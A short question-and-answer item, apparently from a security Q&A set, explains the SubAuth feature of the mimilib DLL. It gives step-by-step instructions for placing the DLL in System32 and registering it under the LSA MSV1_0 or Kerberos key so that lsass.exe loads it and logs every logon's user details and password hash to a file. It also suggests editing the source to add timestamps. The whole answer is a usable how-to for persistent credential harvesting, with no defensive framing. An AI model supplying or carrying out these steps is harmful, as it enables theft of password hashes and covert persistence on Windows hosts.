How does the SubAuth feature of mimilib work and what information does it log?

The SubAuth feature uses the `Msv1_0SubAuthenticationRoutine` and `Msv1_0SubAuthenticationFilter` exports. Deploy mimilib.dll to `%SystemRoot%\System32` and add a registry value `Auth0` (type REG_SZ) under `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0` (or `\Kerberos` for domain controllers). After restart, lsass.exe loads the DLL and logs login events to `kiwisub.log`, recording UserId, PrimaryGroupId, LogonDomainName, UserName, Workstation, BadPasswordCount, and hash. This can be extended to log timestamps by modifying the source code from the mimilib GitHub repository.